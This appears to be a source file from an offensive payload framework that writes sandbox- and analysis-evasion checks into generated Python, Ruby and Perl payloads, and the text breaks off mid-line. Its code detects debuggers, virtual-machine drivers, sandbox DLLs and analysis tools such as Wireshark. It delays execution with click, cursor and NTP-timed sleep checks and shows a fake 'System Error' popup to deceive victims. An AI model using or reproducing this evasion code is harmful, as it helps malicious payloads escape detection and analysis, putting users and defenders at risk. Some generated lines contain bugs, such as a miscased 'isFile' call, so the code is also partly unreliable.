1'''2This file contains the payload sandbox checks for each respective language3'''4from datetime import date5from datetime import timedelta6from Tools.Evasion.evasion_common import evasion_helpers7def senecas_games(evasion_payload):8    # Start checks to determine language9    # Define original values of variables10    num_tabs_required = 011    check_code = ''12    if evasion_payload.language == 'python':13        if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":14            RandToday = evasion_helpers.randomString()15            RandExpire = evasion_helpers.randomString()16            todaysdate = date.today()17            expiredate = str(todaysdate + timedelta(days=int(evasion_payload.required_options["EXPIRE_PAYLOAD"][0])))18            # Create Payload code19            check_code += '\t' * num_tabs_required + 'from datetime import datetime\n'20            check_code += '\t' * num_tabs_required + 'from datetime import date\n'21            check_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'22            check_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'23            check_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'24            # Add a tab for this check25            num_tabs_required += 126        if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":27            rand_hostname = evasion_helpers.randomString()28            check_code += '\t' * num_tabs_required + 'import platform\n'29            check_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'30            check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n'31            # Add a tab for this check32            num_tabs_required += 133        if evasion_payload.required_options["DOMAIN"][0].lower() != "x":34            
rand_domain = evasion_helpers.randomString()35            check_code += '\t' * num_tabs_required + 'import socket\n'36            check_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'37            check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n'38            # Add a tab for this check39            num_tabs_required += 140        if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":41            rand_processor_count = evasion_helpers.randomString()42            check_code += '\t' * num_tabs_required + 'import multiprocessing\n'43            check_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'44            check_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + evasion_payload.required_options["PROCESSORS"][0] + ':\n'45            # Add a tab for this check46            num_tabs_required += 147        if evasion_payload.required_options["USERNAME"][0].lower() != "x":48            rand_user_name = evasion_helpers.randomString()49            check_code += '\t' * num_tabs_required + 'import getpass\n'50            check_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'51            check_code += '\t' * num_tabs_required + 'if \'' + evasion_payload.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n'52            # Add a tab for this check53            num_tabs_required += 154        if evasion_payload.required_options["DETECTDEBUG"][0].lower() != "false":55            is_debugger_present = evasion_helpers.randomString()56            check_code += '\t' * num_tabs_required + 'from ctypes import *\n'57            check_code += '\t' * num_tabs_required + is_debugger_present + ' = windll.kernel32.IsDebuggerPresent()\n'58            check_code += '\t' * num_tabs_required + 'if ' + is_debugger_present + ' == 0:\n'59 
           # Add a tab for this check60            num_tabs_required += 161        if evasion_payload.required_options["VIRTUALDLLS"][0].lower() != "false":62            evidenceof_sandbox = evasion_helpers.randomString()63            sandbox_dlls = evasion_helpers.randomString()64            all_pids = evasion_helpers.randomString()65            pid = evasion_helpers.randomString()66            hProcess = evasion_helpers.randomString()67            curProcessDLLs = evasion_helpers.randomString()68            dll = evasion_helpers.randomString()69            dll_name = evasion_helpers.randomString()70            sandbox_dll = evasion_helpers.randomString()71            check_code += '\t' * num_tabs_required + 'import win32api\n'72            check_code += '\t' * num_tabs_required + 'import win32process\n'73            check_code += '\t' * num_tabs_required + evidenceof_sandbox + '= []\n'74            # removed dbghelp.dll75            check_code += '\t' * num_tabs_required + sandbox_dlls + ' = ["sbiedll.dll","api_log.dll","dir_watch.dll","pstorec.dll","vmcheck.dll","wpespy.dll"]\n'76            check_code += '\t' * num_tabs_required + all_pids + '= win32process.EnumProcesses()\n'77            check_code += '\t' * num_tabs_required + 'for ' + pid + ' in ' + all_pids + ':\n'78            check_code += '\t' * num_tabs_required + '\ttry:\n'79            check_code += '\t' * num_tabs_required + '\t\t' + hProcess + ' = win32api.OpenProcess(0x0410, 0, ' + pid + ')\n'80            check_code += '\t' * num_tabs_required + '\t\ttry:\n'81            check_code += '\t' * num_tabs_required + '\t\t\t' + curProcessDLLs + '= win32process.EnumProcessModules(' + hProcess + ')\n'82            check_code += '\t' * num_tabs_required + '\t\t\tfor ' + dll + ' in ' + curProcessDLLs + ':\n'83            check_code += '\t' * num_tabs_required + '\t\t\t\t' + dll_name + '= str(win32process.GetModuleFileNameEx(' + hProcess + ', ' + dll + ')).lower()\n'84            check_code += '\t' * 
num_tabs_required + '\t\t\t\tfor ' + sandbox_dll + ' in '+ sandbox_dlls + ':\n'85            check_code += '\t' * num_tabs_required + '\t\t\t\t\tif ' + sandbox_dll + ' in ' + dll_name + ':\n'86            check_code += '\t' * num_tabs_required + '\t\t\t\t\t\tif ' + dll_name + ' not in ' + evidenceof_sandbox + ':\n'87            check_code += '\t' * num_tabs_required + '\t\t\t\t\t\t\t' + evidenceof_sandbox + '.append(' + dll_name + ')\n'88            check_code += '\t' * num_tabs_required + '\t\tfinally:\n'89            check_code += '\t' * num_tabs_required + '\t\t\twin32api.CloseHandle(' + pid + ')\n'90            check_code += '\t' * num_tabs_required + '\texcept:\n'91            check_code += '\t' * num_tabs_required + '\t\tpass\n'92            check_code += '\t' * num_tabs_required + 'if not ' + evidenceof_sandbox + ':\n'93            # Add a tab for this check94            num_tabs_required += 195        if evasion_payload.required_options["MINRAM"][0].lower() != "false":96            class_name = evasion_helpers.randomString()97            field_name = evasion_helpers.randomString()98            memory_status = evasion_helpers.randomString()99            check_code += '\t' * num_tabs_required + 'import ctypes\n'100            check_code += '\t' * num_tabs_required + 'class ' + class_name + ' (ctypes.Structure):\n'101            check_code += '\t' * num_tabs_required + '\t_fields_ = [\n'102            check_code += '\t' * num_tabs_required + '\t\t("dwLength", ctypes.c_ulong),\n'103            check_code += '\t' * num_tabs_required + '\t\t("dwMemoryLoad", ctypes.c_ulong),\n'104            check_code += '\t' * num_tabs_required + '\t\t("ullTotalPhys", ctypes.c_ulonglong),\n'105            check_code += '\t' * num_tabs_required + '\t\t("ullAvailPhys", ctypes.c_ulonglong),\n'106            check_code += '\t' * num_tabs_required + '\t\t("ullTotalPageFile", ctypes.c_ulonglong),\n'107            check_code += '\t' * num_tabs_required + '\t\t("ullAvailPageFile", 
ctypes.c_ulonglong),\n'108            check_code += '\t' * num_tabs_required + '\t\t("ullTotalVirtual", ctypes.c_ulonglong),\n'109            check_code += '\t' * num_tabs_required + '\t\t("ullAvailVirtual", ctypes.c_ulonglong),\n'110            check_code += '\t' * num_tabs_required + '\t\t("sullAvailExtendedVirtual", ctypes.c_ulonglong),\n'111            check_code += '\t' * num_tabs_required + '\t]\n'112            check_code += '\t' * num_tabs_required + memory_status + ' = ' + class_name + '()\n'113            check_code += '\t' * num_tabs_required + memory_status + '.dwLength = ctypes.sizeof(' + class_name + ')\n'114            check_code += '\t' * num_tabs_required + 'ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(' + memory_status + '))\n'115            check_code += '\t' * num_tabs_required + 'if ' + memory_status + '.ullTotalPhys/1073741824 > 3:\n'116            # Add a tab for this check117            num_tabs_required += 1118        if evasion_payload.required_options["CLICKTRACK"][0].lower() != "x":119            rand_counter = evasion_helpers.randomString()120            minimum_clicks = evasion_helpers.randomString()121            left_click = evasion_helpers.randomString()122            right_click = evasion_helpers.randomString()123            check_code += '\t' * num_tabs_required + 'import win32api\n'124            check_code += '\t' * num_tabs_required + rand_counter + " = 0\n"125            check_code += '\t' * num_tabs_required + minimum_clicks + " = " + evasion_payload.required_options["CLICKTRACK"][0] + "\n"126            check_code += '\t' * num_tabs_required + 'while ' + rand_counter + ' < ' + minimum_clicks + ':\n'127            check_code += '\t' * num_tabs_required + '\t' + left_click + ' = win32api.GetAsyncKeyState(1)\n'128            check_code += '\t' * num_tabs_required + '\t' + right_click + ' = win32api.GetAsyncKeyState(2)\n'129            check_code += '\t' * num_tabs_required + '\t' + 'if ' + left_click + ' % 2 == 
1:\n'130            check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'131            check_code += '\t' * num_tabs_required + '\t' + 'if ' + right_click + ' % 2 == 1:\n'132            check_code += '\t' * num_tabs_required + '\t\t' + rand_counter + ' += 1\n'133            check_code += '\t' * num_tabs_required + 'if ' + rand_counter + ' >= ' + minimum_clicks + ':\n'134            # Add a tab for this check135            num_tabs_required += 1136        if evasion_payload.required_options["VIRTUALFILES"][0].lower() != "false":137            vmfiles_exist = evasion_helpers.randomString()138            files_tocheck = evasion_helpers.randomString()139            file_path = evasion_helpers.randomString()140            check_code += '\t' * num_tabs_required + 'import os\n'141            check_code += '\t' * num_tabs_required + vmfiles_exist + ' = []\n'142            check_code += '\t' * num_tabs_required + files_tocheck + " = [r'C:\windows\Sysnative\Drivers\Vmmouse.sys', r'C:\windows\Sysnative\Drivers\vm3dgl.dll', r'C:\windows\Sysnative\Drivers\vmdum.dll', r'C:\windows\Sysnative\Drivers\vm3dver.dll', r'C:\windows\Sysnative\Drivers\vmtray.dll', r'C:\windows\Sysnative\Drivers\vmci.sys', r'C:\windows\Sysnative\Drivers\vmusbmouse.sys', r'C:\windows\Sysnative\Drivers\vmx_svga.sys', r'C:\windows\Sysnative\Drivers\vmxnet.sys', r'C:\windows\Sysnative\Drivers\VMToolsHook.dll', r'C:\windows\Sysnative\Drivers\vmhgfs.dll', r'C:\windows\Sysnative\Drivers\vmmousever.dll', r'C:\windows\Sysnative\Drivers\vmGuestLib.dll', r'C:\windows\Sysnative\Drivers\VmGuestLibJava.dll', r'C:\windows\Sysnative\Drivers\vmscsi.sys', r'C:\windows\Sysnative\Drivers\VBoxMouse.sys', r'C:\windows\Sysnative\Drivers\VBoxGuest.sys', r'C:\windows\Sysnative\Drivers\VBoxSF.sys', r'C:\windows\Sysnative\Drivers\VBoxVideo.sys', r'C:\windows\Sysnative\vboxdisp.dll', r'C:\windows\Sysnative\vboxhook.dll', r'C:\windows\Sysnative\vboxmrxnp.dll', r'C:\windows\Sysnative\vboxogl.dll', 
r'C:\windows\Sysnative\vboxoglarrayspu.dll', r'C:\windows\Sysnative\vboxoglcrutil.dll', r'C:\windows\Sysnative\vboxoglerrorspu.dll', r'C:\windows\Sysnative\vboxoglfeedbackspu.dll', r'C:\windows\Sysnative\vboxoglpackspu.dll', r'C:\windows\Sysnative\vboxoglpassthroughspu.dll', r'C:\windows\Sysnative\vboxservice.exe', r'C:\windows\Sysnative\vboxtray.exe', r'C:\windows\Sysnative\VBoxControl.exe']"143            check_code += '\t' * num_tabs_required + 'for ' + file_path + ' in ' + files_tocheck + ':\n'144            check_code += '\t' * num_tabs_required + '\tif os.path.isFile(' + file_path + '):\n'145            check_code += '\t' * num_tabs_required + '\t\t' + vmfiles_exist + '.append(' + file_path + ')'146            check_code += '\t' * num_tabs_required + 'if not ' + vmfiles_exist + ':\n'147            # Add a tab for this check148            num_tabs_required += 1149        if evasion_payload.required_options["CURSORMOVEMENT"][0].lower() != "false":150            seconds = evasion_helpers.randomString()151            x_position = evasion_helpers.randomString()152            y_position = evasion_helpers.randomString()153            x2_position = evasion_helpers.randomString()154            y2_position = evasion_helpers.randomString()155            check_code += '\t' * num_tabs_required + 'from time import sleep\n'156            check_code += '\t' * num_tabs_required + 'import win32api\n'157            check_code += '\t' * num_tabs_required + seconds + ' = 30\n'158            check_code += '\t' * num_tabs_required + x_position + ', ' + y_position + ' = win32api.GetCursorPos()\n'159            check_code += '\t' * num_tabs_required + 'sleep(30)\n'160            check_code += '\t' * num_tabs_required + x2_position + ', ' + y2_position + ' = win32api.GetCursorPos()\n'161            check_code += '\t' * num_tabs_required + 'if ' + x_position + ' - ' + x2_position + ' != 0 or ' + y_position + ' - ' + y2_position + ' != 0:\n'162            # Add a tab for this check163   
         num_tabs_required += 1164        if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":165            popup_title = evasion_helpers.randomString()166            popup_message = evasion_helpers.randomString()167            message_box = evasion_helpers.randomString()168            check_code += '\t' * num_tabs_required + 'import ctypes\n'169            check_code += '\t' * num_tabs_required + popup_title + ' = "System Error 0x18463832"\n'170            check_code += '\t' * num_tabs_required + popup_message + ' = "Your system encountered an error, please click OK to proceed"\n'171            check_code += '\t' * num_tabs_required + message_box + ' = ctypes.windll.user32.MessageBoxW\n'172            check_code += '\t' * num_tabs_required + message_box + '(None, ' + popup_message + ', ' + popup_title + ', 0)\n'173            check_code += '\t' * num_tabs_required + 'if True:\n'174            # Add a tab for this check175            num_tabs_required += 1176        if evasion_payload.required_options["SANDBOXPROCESS"][0].lower() != "false":177            sandbox_exist = evasion_helpers.randomString()178            bad_procs = evasion_helpers.randomString()179            current_processes = evasion_helpers.randomString()180            process = evasion_helpers.randomString()181            sandbox_proc = evasion_helpers.randomString()182            check_code += '\t' * num_tabs_required + 'import win32pdh\n'183            check_code += '\t' * num_tabs_required + sandbox_exist + ' = []\n'184            check_code += '\t' * num_tabs_required + bad_procs + ' = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"\n'185            check_code += '\t' * num_tabs_required + '_, ' + current_processes + ' = win32pdh.EnumObjectItems(None,None,\'process\', 
win32pdh.PERF_DETAIL_WIZARD)\n'186            check_code += '\t' * num_tabs_required + 'for ' + process + ' in ' + current_processes + ':\n'187            check_code += '\t' * num_tabs_required + '\tfor ' + sandbox_proc + ' in ' + bad_procs + ':\n'188            check_code += '\t' * num_tabs_required + '\t\tif ' + sandbox_proc + ' in str(' + process + '.lower()):\n'189            check_code += '\t' * num_tabs_required + '\t\t\t' + sandbox_exist + '.append(' + process + ')\n'190            check_code += '\t' * num_tabs_required + '\t\t\tbreak\n'191            check_code += '\t' * num_tabs_required + 'if not ' + sandbox_exist + ':\n'192            # Add a tab for this check193            num_tabs_required += 1194        if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":195            time_import = evasion_helpers.randomString()196            check_code += '\t' * num_tabs_required + 'import time as ' + time_import + '\n'197            check_code += '\t' * num_tabs_required + 'if ' + time_import + '.tzname[0] != "Coordinated Universal Time" and ' + time_import + '.tzname[1] != "Coordinated Universal Time":\n'198            # Add a tab for this check199            num_tabs_required += 1200        if evasion_payload.required_options["SLEEP"][0].lower() != "x":201            rand_time_name = evasion_helpers.randomString()202            check_code += '\t' * num_tabs_required + 'from time import sleep\n'203            check_code += '\t' * num_tabs_required + 'from socket import AF_INET, SOCK_DGRAM\n'204            check_code += '\t' * num_tabs_required + 'import sys\n'205            check_code += '\t' * num_tabs_required + 'import datetime\n'206            check_code += '\t' * num_tabs_required + 'import time\n'207            check_code += '\t' * num_tabs_required + 'import socket\n'208            check_code += '\t' * num_tabs_required + 'import struct\n'209            check_code += '\t' * num_tabs_required + 'client = socket.socket(AF_INET, 
SOCK_DGRAM)\n'210            check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'211            check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'212            check_code += '\t' * num_tabs_required + rand_time_name + ' = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)\n'213            check_code += '\t' * num_tabs_required + 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n'214            check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n'215            check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n'216            check_code += '\t' * num_tabs_required + 'if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - ' + rand_time_name + ').seconds >= ' + evasion_payload.required_options["SLEEP"][0] + '):\n'217            # Add a tab for this check218            num_tabs_required += 1219        # Return check information220        return check_code, num_tabs_required221    elif evasion_payload.language == 'ruby':222        if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":223            check_code += 'require \'socket\'\n'224            check_code += 'hostname = Socket.gethostname.downcase\n'225            check_code += 'if hostname[\"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\"]\n'226            # Add a tab for this check227            num_tabs_required += 1228        if evasion_payload.required_options["DOMAIN"][0].lower() != "x":229            check_code += 'require \'socket\'\n'230            check_code += 'domain = Socket.gethostname.downcase\n'231            check_code += 'if domain[\"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\"]\n'232            # Add a tab for this check233            num_tabs_required += 1234  
      if evasion_payload.required_options["USERNAME"][0].lower() != "x":235            check_code += 'name = ENV["USERNAME"].downcase\n'236            check_code += 'if name[\"' + evasion_payload.required_options["USERNAME"][0].lower() + '\"]\n'237            # Add a tab for this check238            num_tabs_required += 1239        #if evasion_payload.required_options["DISKSIZE"][0].lower() != "x":240        #    check_code += "require 'win32api'\n"241        #    check_code += 'minDiskSizeGB = 50\n'242        #    check_code += "GetDiskFreeSpaceEx = Win32API.new(\"kernel32\", \"GetDiskFreeSpaceEx\", ['P','P','P','P'], 'I')\n"243        #    check_code += 'diskSizeBytes = [0].pack("Q"); freeBytesAvail = [0].pack("Q"); totalFreeBytes = [0].pack("Q")\n'244        #    check_code += 'GetDiskFreeSpaceEx.call("C:", freeBytesAvail, diskSizeBytes, totalFreeBytes)\n'245        #    check_code += 'diskSizeGB = diskSizeBytes.unpack("Q").first / 1073741824.0\n'246        #    check_code += 'if diskSizeGB > minDiskSizeGB'247            # Add a tab for this check248        #    num_tabs_required += 1249        #if evasion_payload.required_options["NUMPROCS"][0].lower() != "x":250        #    check_code += "require 'win32ole'\n"251        #    check_code += 'if (WIN32OLE.connect("winmgmts://").ExecQuery("SELECT NumberOfCores FROM Win32_Processor").to_enum.first.NumberOfCores >= ' + evasion_payload.required_options["NUMPROCS"][0] + ')\n'252            # Add a tab for this check253        #    num_tabs_required += 1254        #if evasion_payload.required_options["MINRAM"][0].lower() != 'x':255        #if evasion_payload.required_options["USERPROMPT"][0].lower() != "x":256        ##    title_bar = evasion_helpers.randomString()257         #   body_text = evasion_helpers.randomString()258         #   winapi_call = evasion_helpers.randomString()259        #    check_code += 'require "Win32API"\n'260        #    check_code += title_bar + ' = "System Error Encountered"\n'261        #   
 check_code += body_text + ' = "Error encountered at address 0x41d3837f. Press OK to continue"\n'262        #    check_code += winapi_call + " = Win32API.new('user32', 'MessageBox',['L', 'P', 'P', 'L'],'I')\n"263        #    check_code += winapi_call + '.call(0,dialogBoxMessage,dialogBoxTitle,0)\n'264        #    check_code += 'if true\n'265            # Add a tab for this check266        #    num_tabs_required += 1267        if evasion_payload.required_options["SLEEP"][0].lower() != "x":268            check_code += 'require \'socket\'\n'269            check_code += 'ntp_msg = (["00011011"] + Array.new(47,1)).pack("B8 C47")\n'270            check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960);sock.close\n'271            check_code += 'firstTime = Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800)\n'272            check_code += 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n'273            check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960)\n'274            check_code += 'if (Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800) - firstTime >= ' + evasion_payload.required_options["SLEEP"][0] + ')\n'275            # Add a tab for this check276            num_tabs_required += 1277        # Return check information278        return check_code, num_tabs_required279    elif evasion_payload.language == 'perl':280        if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":281            rand_hostname = evasion_helpers.randomString()282            check_code += '\t' * num_tabs_required + 'Use Sys::Hostname;\n'283            check_code += '\t' * num_tabs_required + 'my $' + rand_hostname + ' = hostname;\n'284            check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_hostname + '), lc(' + evasion_payload.required_options["HOSTNAME"][0] + ')) != -1){\n'285     
       # Add a tab for this check286            num_tabs_required += 1287        if evasion_payload.required_options["USERPROMPT"][0].lower() != 'x':288            flags = evasion_helpers.randomString()289            title_bar_prompt = evasion_helpers.randomString()290            message_prompt = evasion_helpers.randomString()291            msg_box = evasion_helpers.randomString()292            check_code += '\t' * num_tabs_required + 'use Win32;\n'293            check_code += '\t' * num_tabs_required + '$' + flags + ' = 0x0;\n'294            check_code += '\t' * num_tabs_required + '$' + msg_box + ' = new Win32::API ( "user32", "MessageBox", [N, P, P, I], N );\n'295            check_code += '\t' * num_tabs_required + '$' + msg_box + '->Call ( 0, "System error at 0x48d72ac3. Press OK to continue.", "System Error Encountered", $' + flags + ');'296            check_code += '\t' * num_tabs_required + 'if (1) {\n'297            # Add a tab for this check298            num_tabs_required += 1299        if evasion_payload.required_options["RAMSIZE"][0].lower() != 'x':300            wmi_cim = evasion_helpers.randomString()301            total_ram = evasion_helpers.randomString()302            subMem = evasion_helpers.randomString()303            check_code += '\t' * num_tabs_required + 'use Win32::OLE qw(EVENTS HRESULT in);\n'304            check_code += '\t' * num_tabs_required + 'my $' + wmi_cim + ' = Win32::OLE->GetObject("WINMGMTS://./root/CIMv2");\n'305            check_code += '\t' * num_tabs_required + 'my $' + total_ram + ' = 0;\n'306            check_code += '\t' * num_tabs_required + 'foreach my $' + subMem + ' (in($' + wmi_cim + '->InstancesOf("Win32_PhysicalMemory"))) {\n'307            check_code += '\t' * num_tabs_required + '\t$' + total_ram + ' += $' + subMem + '->{Capacity};\n'308            check_code += '\t' * num_tabs_required + '}\n'309            check_code += '\t' * num_tabs_required + 'if ($' + total_ram + '/1073741824 > ' + 
evasion_payload.required_options["RAMSIZE"][0] + ') {\n'310            # Add a tab for this check311            num_tabs_required += 1312        if evasion_payload.required_options["FILENAME"][0].lower() != 'x':313            expected_name = evasion_helpers.randomString()314            actual_name = evasion_helpers.randomString()315            check_code += '\t' * num_tabs_required + 'use File::Basename;\n'316            check_code += '\t' * num_tabs_required + 'my $' + expected_name + ' = "' + evasion_payload.required_options["FILENAME"][0].lower() + '";\n'317            check_code += '\t' * num_tabs_required + 'my $' + actual_name + ' = basename($0);\n'318            check_code += '\t' * num_tabs_required + 'if (index($' + actual_name + ', $' + expected_name + ') != -1) {\n'319            # Add a tab for this check320            num_tabs_required += 1321        if evasion_payload.required_options["NUMPROCS"][0].lower() != 'x':322            min_procs = evasion_helpers.randomString()323            wmi_var = evasion_helpers.randomString()324            total_procs = evasion_helpers.randomString()325            check_code += '\t' * num_tabs_required + 'use Win32::OLE;\n'326            check_code += '\t' * num_tabs_required + 'my $' + min_procs + ' = ' + evasion_payload.required_options["NUMPROCS"][0] + ';\n'327            check_code += '\t' * num_tabs_required + 'my $' + wmi_var + ' = Win32::OLE->GetObject("winmgmts:\\\\\\\\localhost\\\\root\\\\CIMV2") or die;\n'328            check_code += '\t' * num_tabs_required + 'my $' + total_procs + ' = $' + wmi_var + '->ExecQuery("SELECT * FROM Win32_Process")->{Count} or die;\n'329            check_code += '\t' * num_tabs_required + 'if ($' + total_procs + ' > $' + min_procs + ') {\n'330            # Add a tab for this check331            num_tabs_required += 1332        if evasion_payload.required_options["DISKSIZE"][0].lower() != 'x':333            min_disksize = evasion_helpers.randomString()334            file_object = 
evasion_helpers.randomString()335            real_disksize = evasion_helpers.randomString()336            check_code += '\t' * num_tabs_required + 'use Win32::OLE;\n'337            check_code += '\t' * num_tabs_required + 'my $' + min_disksize + ' = ' + evasion_payload.required_options['DISKSIZE'][0] + ';\n'338            check_code += '\t' * num_tabs_required + 'my $' + file_object + ' = Win32::OLE->CreateObject("Scripting.FileSystemObject");\n'339            check_code += '\t' * num_tabs_required + 'my $' + real_disksize + ' = $' + file_object + '->GetDrive("C:")->{TotalSize}/1073741824.0;\n'340            check_code += '\t' * num_tabs_required + 'if ($' + min_disksize + ' < $' + real_disksize + ') {\n'341            # Add a tab for this check342            num_tabs_required += 1343        if evasion_payload.required_options["NUMCLICKS"][0].lower() != 'x':344            perl_min_clicks = evasion_helpers.randomString()345            perl_key_state = evasion_helpers.randomString()346            click_count = evasion_helpers.randomString()347            perl_leftclick = evasion_helpers.randomString()348            perl_rightclick = evasion_helpers.randomString()349            check_code += '\t' * num_tabs_required + 'my $' + perl_min_clicks + ' = ' + evasion_payload.required_options["NUMCLICKS"][0] + ';\n'350            check_code += '\t' * num_tabs_required + 'my $' + perl_key_state + ' = new Win32::API("user32", "GetAsyncKeyState", +"I", "N");\n'351            check_code += '\t' * num_tabs_required + 'my $' + click_count + ' = 0;\n'352            check_code += '\t' * num_tabs_required + 'while ($' + click_count + ' < $' + perl_min_clicks + ') {\n'353            check_code += '\t' * num_tabs_required + '\tmy $' + perl_leftclick + ' = $' + perl_key_state + '->Call(1);\n'354            check_code += '\t' * num_tabs_required + '\tmy $' + perl_rightclick + ' = $' + perl_key_state + '->Call(2);\n'355            check_code += '\t' * num_tabs_required + '\tif ($' + 
perl_leftclick + ') {\n'356            check_code += '\t' * num_tabs_required + '\t\t++$' + click_count + ';\n'357            check_code += '\t' * num_tabs_required + '\t}\n'358            check_code += '\t' * num_tabs_required + '\tif ($' + perl_rightclick + ') {\n'359            check_code += '\t' * num_tabs_required + '\t\t++$' + click_count + ';\n'360            check_code += '\t' * num_tabs_required + '\t}\n'361            check_code += '\t' * num_tabs_required + '\tsleep(2);\n'362            check_code += '\t' * num_tabs_required + '}\n'363            check_code += '\t' * num_tabs_required + 'if (1) {\n'364            # Add a tab for this check365            num_tabs_required += 1366        if evasion_payload.required_options["REGSIZE"][0].lower() != 'x':367            reg_mb_size = evasion_helpers.randomString()368            perl_wmi = evasion_helpers.randomString()369            reg_dump = evasion_helpers.randomString()370            reg_size = evasion_helpers.randomString()371            perl_reg_obj = evasion_helpers.randomString()372            check_code += '\t' * num_tabs_required + 'use Win32::OLE;\n'373            check_code += '\t' * num_tabs_required + 'my $' + reg_mb_size + ' = ' + evasion_payload.required_options["REGSIZE"][0] + ';\n'374            check_code += '\t' * num_tabs_required + 'my $' + perl_wmi + ' = Win32::OLE->GetObject("winmgmts:\\\\\\\\localhost\\\\root\\\\CIMV2") or die;\n'375            check_code += '\t' * num_tabs_required + 'my $' + reg_dump + ' = $' + perl_wmi + '->ExecQuery("SELECT CurrentSize from Win32_Registry") or die;\n'376            check_code += '\t' * num_tabs_required + 'my $' + reg_size + ';\n'377            check_code += '\t' * num_tabs_required + 'foreach my $' + perl_reg_obj + ' (in $' + reg_dump + ') { $' + reg_size + ' = $' + perl_reg_obj + '->CurrentSize; }\n'378            check_code += '\t' * num_tabs_required + 'if ($' + reg_size + ' > $' + reg_mb_size + ') {\n'379            # Add a tab for this 
check380            num_tabs_required += 1381        if evasion_payload.required_options["USERNAME"][0].lower() != "x":382            rand_name = evasion_helpers.randomString()383            check_code += '\t' * num_tabs_required + 'my $' + rand_name + ' = Win32::LoginName;\n'384            check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_name + '), lc(\"' + evasion_payload.required_options["USERNAME"][0] + '\")) != -1){\n'385            # Add a tab for this check386            num_tabs_required += 1387        if evasion_payload.required_options["DOMAIN"][0].lower() != "x":388            rand_domain = evasion_helpers.randomString()389            check_code += '\t' * num_tabs_required + 'use Net::Domain qw (hostdomain);\n'390            check_code += '\t' * num_tabs_required + 'my $' + rand_domain + ' = hostdomain();\n'391            check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_domain + '), lc(\"' + evasion_payload.required_options["DOMAIN"][0] + '\")) != -1){\n'392            # Add a tab for this check393            num_tabs_required += 1394        if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":395            rand_corecount = evasion_helpers.randomString()396            check_code += '\t' * num_tabs_required + 'my $' + rand_corecount + ' = $ENV{\"NUMBER_OF_PROCESSORS\"};'397            check_code += '\t' * num_tabs_required + 'if ($' + rand_corecount + ' >=  '+ evasion_payload.required_options["PROCESSORS"][0] + '){\n'398            # Add a tab for this check399            num_tabs_required += 1400        if evasion_payload.required_options["SLEEP"][0].lower() != "x":401            check_code += '\t' * num_tabs_required + 'use IO::Socket;'402            check_code += '\t' * num_tabs_required + 'my $firstTime;my $secondTime;my $sock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n'403            check_code += '\t' * num_tabs_required + 'my $NTPTransmit = 
